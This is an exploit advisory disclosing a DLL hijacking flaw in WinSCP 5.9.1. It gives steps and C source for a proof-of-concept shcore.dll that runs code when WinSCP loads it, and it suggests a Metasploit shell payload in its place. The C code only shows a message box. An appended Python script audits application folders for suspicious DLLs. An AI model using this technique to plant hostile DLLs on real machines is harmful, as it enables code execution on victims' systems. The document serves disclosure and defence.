WinSCP 5.9.1 DLL Hijacking
Posted on 09 September 2016
# Exploit Title: WinSCP DLL Hijacking Exploit (shcore.dll)
# Date: 03-09-2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage: http://winscp.net/
# Software Link: http://winscp.net/download/WinSCP-5.9.1-Setup.exe
# Version: 5.9.1
# Tested on: Windows 7
# Exploit by : Amir.ght
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
Vuln DLL: shcore.dll

WinSCP is an open source free SFTP client, FTP client, WebDAV client and SCP client for Windows. Its main function is file transfer between a local and a remote computer.

WinSCP.exe will search for and load any DLL named "shcore.dll". If an attacker can place the DLL in a location where the victim opens WinSCP.exe, it will load and run the attacker's DLL and code. An attacker can also generate a msfpayload DLL and spawn a shell, for example.
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+
# Exploit:
1- Save and compile the C code below as 'shcore.dll' to create the vuln DLL
2- Place 'shcore.dll' in the same directory as WinSCP
3- Open WinSCP.exe

//gcc test.c -o shcore.dll -shared
//this dll shows a message box
#include <windows.h>
#define DllExport __declspec (dllexport)

/* Declared before DllMain so the call below compiles without an implicit declaration. */
int dll_hijack(void);

/* Called by the loader when the DLL is loaded into WinSCP.exe. */
BOOL WINAPI DllMain (
    HANDLE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    dll_hijack();
    return 0;
}

/* Shows a message box as proof that the DLL's code ran. */
int dll_hijack(void)
{
    MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
    return 0;
}

#################################
Discovered By : Amir.ght
#################################
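A defender-side check for the condition described above, added here as an example and not part of the original advisory: it lists DLLs in an application directory whose name is on a watchlist (shcore.dll, from this advisory) or also exists in the system directory. The function name, the watchlist and the report labels are assumptions of this example.

```python
import hashlib
import os

# DLL names an application is known to probe for; shcore.dll is from this advisory.
WATCHLIST = {"shcore.dll"}

def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def audit_app_dir(app_dir, system_dir, watchlist=WATCHLIST):
    """Return (file name, reason) for DLLs in app_dir that could be loaded
    in place of a system DLL. reason is 'watchlist',
    'shadows-system-different' or 'shadows-system-identical'."""
    # Windows file names are case-insensitive, so compare lower-cased names.
    system = {}
    if os.path.isdir(system_dir):
        for name in os.listdir(system_dir):
            if name.lower().endswith(".dll"):
                system[name.lower()] = os.path.join(system_dir, name)
    findings = []
    for name in sorted(os.listdir(app_dir)):
        key = name.lower()
        path = os.path.join(app_dir, name)
        if not key.endswith(".dll") or not os.path.isfile(path):
            continue
        if key in system:
            # Same name as a system DLL: hash both to separate a plain copy
            # from a file with different content.
            same = _sha256(path) == _sha256(system[key])
            findings.append((name, "shadows-system-identical" if same
                             else "shadows-system-different"))
        elif key in watchlist:
            findings.append((name, "watchlist"))
    return findings

if __name__ == "__main__":
    import sys
    # Assumed usage: audit.py <application directory> <system directory>
    for name, reason in audit_app_dir(sys.argv[1], sys.argv[2]):
        print(f"{reason}\t{name}")
```

On a Windows host the two arguments would typically be the WinSCP install directory and C:\Windows\System32.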